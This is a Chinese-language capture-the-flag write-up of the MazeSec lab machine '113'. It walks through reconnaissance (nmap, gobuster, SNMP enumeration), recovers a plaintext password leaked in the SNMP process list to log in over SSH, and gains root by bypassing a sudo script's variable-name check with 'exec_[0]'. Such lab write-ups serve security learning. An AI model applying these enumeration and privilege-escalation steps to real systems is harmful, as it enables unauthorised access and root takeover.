![113[MazeSec]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_writeup_cover_2dcbf3013efda15f.gif)
信息收集
bash
┌──(root㉿kali)-[~]└─# arp-scan -l | grep PCS192.168.31.228 08:00:27:82:5e:1a PCS Systemtechnik GmbH ┌──(root㉿kali)-[~]└─# IP=192.168.31.228 bash
┌──(root㉿kali)-[~]└─# nmap -sV -sC -A $IP -PnStarting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 05:13 ESTNmap scan report for 113 (192.168.31.228)Host is up (0.00099s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)| ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)80/tcp open http Apache httpd 2.4.62 ((Debian))|_http-server-header: Apache/2.4.62 (Debian)|_http-title: 400 Bad RequestMAC Address: 08:00:27:82:5E:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTEHOP RTT ADDRESS1 0.99 ms 113 (192.168.31.228) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.26 seconds目录扫描
bash
┌──(root㉿kali)-[~]└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.31.228[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.6[+] Extensions: php,php3,txt,bk,zip,tar,gz,html,bak,shtml[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.html (Status: 403) [Size: 279]/index.html (Status: 200) [Size: 796]/.php (Status: 403) [Size: 279]/.php (Status: 403) [Size: 279]/.html (Status: 403) [Size: 279]/server-status (Status: 403) [Size: 279]Progress: 2426160 / 2426171 (100.00%)===============================================================Finished===============================================================80 端口没东西
UDP 扫描
bash
┌──(root㉿kali)-[~]└─# nmap -sU -T5 --min-rate 100 --max-rate 500 $IPStarting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 05:44 ESTWarning: 192.168.31.228 giving up on port because retransmission cap hit (2).Nmap scan report for 113 (192.168.31.228)Host is up (0.0013s latency).Not shown: 983 open|filtered udp ports (no-response)PORT STATE SERVICE161/udp open snmp643/udp closed sanity1072/udp closed cardax1087/udp closed cplscrambler-in1090/udp closed ff-fms1782/udp closed hp-hcip1901/udp closed fjicl-tep-a3456/udp closed IISrpc-or-vat6004/udp closed X11:46050/udp closed x1119374/udp closed unknown36669/udp closed unknown42313/udp closed unknown42577/udp closed unknown42627/udp closed unknown51456/udp closed unknown51972/udp closed unknownMAC Address: 08:00:27:82:5E:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds发现 161 端口开着 snmp 服务
接下来检查 snmp 服务看看有没有泄露信息
bash
┌──(root㉿kali)-[~]└─# snmp-check $IPsnmp-check v1.9 - SNMP enumeratorCopyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 192.168.31.228:161 using SNMPv1 and community 'public' [*] System information: Host IP address : 192.168.31.228 Hostname : 113 Description : Linux 113 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 Contact : root Location : Unknown Uptime snmp : 00:35:33.04 Uptime system : 00:35:19.11 System date : 2026-1-18 05:46:42.0 [*] Network information: IP forwarding enabled : no Default TTL : 64 TCP segments received : 2607728 TCP segments sent : 2596341 TCP segments retrans : 6 Input datagrams : 2623891 Delivered datagrams : 2623891 Output datagrams : 2596916 [*] Network interfaces: Interface : [ up ] lo Id : 1 Mac Address : ::::: Type : softwareLoopback Speed : 10 Mbps MTU : 65536 In octets : 8184 Out octets : 8184 Interface : [ up ] Intel Corporation 82540EM Gigabit Ethernet Controller Id : 2 Mac Address : 08:00:27:82:5e:1a Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 417797211 Out octets : 1231871439 [*] Network IP: Id IP Address Netmask Broadcast 1 127.0.0.1 255.0.0.0 0 2 192.168.31.228 255.255.255.0 1 [*] Routing information: Destination Next hop Mask Metric 0.0.0.0 192.168.31.1 0.0.0.0 1 192.168.31.0 0.0.0.0 255.255.255.0 0 [*] TCP connections and listening ports: Local address Local port Remote address Remote port State 0.0.0.0 22 0.0.0.0 0 listen [*] Listening UDP ports: Local address Local port 0.0.0.0 68 0.0.0.0 161 [*] Processes: Id Status Name Path Parameters ... 352 runnable systemd-logind /lib/systemd/systemd-logind 376 runnable sleep service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080 infinity 385 runnable dhclient /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0...从进程列表中看到了 sleep 进程 PID 376 在 8080 端口开了个服务 service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080,用户名 welcome 和密码 mMOq2WWONQiiY8TinSRF
试试看能不能拿来登录 ssh
bash
┌──(root㉿kali)-[~]└─# ssh welcome@$IP -p 22The authenticity of host '192.168.31.228 (192.168.31.228)' can't be established.ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.31.228' (ED25519) to the list of known hosts.welcome@192.168.31.228's password: Linux 113 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Wed Jan 14 08:32:23 2026 from 192.168.3.94welcome@113:~$ iduid=1000(welcome) gid=1000(welcome) groups=1000(welcome)welcome@113:~$ ls -ah. .. .bash_history .bash_logout .bashrc .profile user.txtwelcome@113:~$ cat user.txtflag{user-21539141ad1bc8ab9d26420aecb2415b}提权
列出当前用户允许通过 sudo 执行的命令
bash
welcome@113:~$ sudo -lMatching Defaults entries for welcome on 113: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User welcome may run the following commands on 113: (ALL) NOPASSWD: /opt/113.sh查看 /opt/113.sh 的内容
bash
welcome@113:~$ cat /opt/113.sh#!/bin/bash sandbox=$(mktemp -d)cd $sandbox if [ "$#" -ne 3 ];then exitfi if [ "$3" != "mazesec" ]then echo "\$3 must be mazesec" exit else /bin/cp /usr/bin/mazesec $sandbox exec_="$sandbox/mazesec"fi if [ "$1" = "exec_" ];then exitfi declare -- "$1"="$2"$exec_最后这几行存在漏洞:
bash
if [ "$1" = "exec_" ];then exitfi declare -- "$1"="$2"$exec_脚本逻辑是:
- 定义变量
exec_指向脚本$sandbox/mazesec - 禁止将第一个参数
$1命名为exec_ - 使用
declare动态声明变量,将$2赋值给名为$1的变量 - 执行
$exec_
目标是覆盖 exec_ 变量,将其改为 /bin/bash,从而拿到 root shell
虽然脚本显式禁止了 $1 等于 "exec_",但是 bash 中变量和数组的第 0 个元素是等价的,也就是说 exec_ 等同于 exec_[0]
但是字符串比较时 "exec_[0]" 不等于 "exec_"
因此可以传递 exec_[0] 作为变量名来绕过 if 检查,利用 declare 覆盖 exec_ 变量的值
bash
welcome@113:~$ sudo /opt/113.sh "exec_[0]" "/bin/bash" "mazesec"root@113:/tmp/tmp.NFoFntObm4# iduid=0(root) gid=0(root) groups=0(root)root@113:/tmp/tmp.NFoFntObm4# cd /rootroot@113:~# ls -ah. .. 113rootpass.txt .bash_history .bashrc .cache .gnupg .local .profile root.txt .ssh .viminforoot@113:~# cat root.txtflag{root-9f283fe2f6363f99f80ed7f3f3c3cb19}